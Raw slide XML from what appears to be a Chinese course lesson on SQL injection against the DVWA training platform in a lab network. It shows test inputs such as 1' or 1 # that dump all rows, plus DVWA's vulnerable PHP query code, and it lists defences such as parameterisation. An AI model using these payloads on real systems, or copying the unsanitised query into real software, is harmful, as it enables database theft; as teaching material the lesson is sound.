            <a:ext cx="10800080" cy="4587875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marR="0" indent="0" algn="just" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <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rPr>
              <a:t>四、防范措施</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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50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1、特殊字符转义</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2、输入验证和过滤</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3、参数化方法</a:t>
            </a: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0" marR="0" indent="457200" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr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20" name="文本框 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720090" y="1776095"/>
            <a:ext cx="10800080" cy="2027555"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="90170" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>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rPr>
              <a:t>我们将利用SQL注入漏洞来获取DVWA平台的用户名和密码。本节的学习任务分为两部分：</a:t>
            </a:r>
            <a:endPara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rPr>
              <a:t>一、low级别的SQL注入漏洞的利用。</a:t>
            </a:r>
            <a:endPara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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="0" indent="609600" algn="just"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rPr>
              <a:t>二、分析medium、high和impossible级别的SQL注入源代码。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="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kern="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:endParaRPr sz="2400" kern="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uFillTx/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr sz="2400" kern="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:uFillTx/>
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="266700" algn="just">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uFillTx/>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任务实施】</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5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="751840" y="1828165"/>
            <a:ext cx="10800080" cy="1913890"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marR="0" indent="266700" algn="just">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>本任务所使用的计算机</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="0" indent="266700" algn="just">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pP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endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="0" indent="266700" algn="just">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在Web服务服上安装了DVWA平台。访问地址：http://192.168.1.201/dvwa/。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">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6" name="表格 5"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="855980" y="2304000"/>
          <a:ext cx="10558145" cy="995680"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1000125"/>
                <a:gridCol w="3966210"/>
                <a:gridCol w="2205355"/>
                <a:gridCol w="3386455"/>
              </a:tblGrid>
              <a:tr h="367665">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0" algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="2000" b="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>编号</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操作系统</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IP地址</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0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>用途</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="12700" marR="12700" marT="1270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797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Server 2008</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192.168.1.201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Web服务器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004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Windows 7</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192.168.66.134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客户机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90" y="1350010"/>
            <a:ext cx="10800080" cy="2534920"/>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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、攻击准备</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r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101"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在客户机上打开浏览器，访问http://192.168.1.201/dvwa/。输入用户名和密码进行登录。登录后，检查DVWA的“Security”模块，查看当前的安全级别是否为“low”。如果当前级别不是“low”，将其更改为“low”。然后，点击“SQL Injection”模块，也就是SQL注入漏洞模块。</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spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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4"/>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00" y="1350010"/>
            <a:ext cx="11106150" cy="49466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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、攻击准备</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lvl="0" indent="0" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入操作步骤：输入注入值</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>；提交注入；</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>分析结果</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4"/>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5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2336400" y="1905000"/>
            <a:ext cx="7560000" cy="3825742"/>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p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>1、学会使用AWVS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>2、学会使用OWASP-ZAP</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN"/>
              <a:t>、认识Burp Suite的功能</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、学会使用Burp Suite的拦截代理工具</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="252730" y="56515"/>
            <a:ext cx="547560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rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>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90" y="1350010"/>
            <a:ext cx="10800080" cy="3309620"/>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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"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判断是否存在注入点</a:t>
            </a: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10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① 注入：1，能够正常显示结果。</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② 注入：'（单引号），页面显示报错。</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endParaRPr lang="en-US" altLang="zh-CN"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12" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3466800" y="2491105"/>
            <a:ext cx="5272405" cy="1064260"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1695600" y="4283075"/>
            <a:ext cx="8812530" cy="230505"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="40005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90" y="1350000"/>
            <a:ext cx="10800080" cy="4464050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、判断是否存在注入点</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="6096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③ 注入：1' or 1 #，能够遍历显示全部数据。</a:t>
            </a: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20000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct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457200" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct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根据①、②、③的结果，证明存在SQL注入点。</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5"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3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId4"/>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14" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3466800" y="2410460"/>
            <a:ext cx="5269865" cy="2933700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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00" y="1350000"/>
            <a:ext cx="10800000" cy="5373370"/>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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、判断注入类型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1"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① 注入：2，能够正常显示结果。</a:t>
            </a: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② 注入：1+1，能够正常显示结果。</a:t>
            </a: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5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如果①与②的结果显示一致，则为数字型注入，否则为字符型注入。因此，这里是字符型注入。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"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6"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10" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3466800" y="2389188"/>
            <a:ext cx="5267960" cy="1077595"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3466800" y="4104005"/>
            <a:ext cx="5272405" cy="1064260"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="标题 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId8"/>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20000" y="1325245"/>
            <a:ext cx="10800000" cy="55562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cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>源代码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"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10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a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>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5"/>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49"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2620800" y="2011680"/>
            <a:ext cx="6958330" cy="407797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20090" y="1325245"/>
            <a:ext cx="10800080" cy="3091180"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>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cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>源代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可以看到：</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20000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct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altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>第5行：</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>$id = $_REQUEST[ 'id' ];</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20000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct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altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>第8行：</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SELECT first_name, last_name FROM users WHERE user_id = '$id';</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lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct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altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
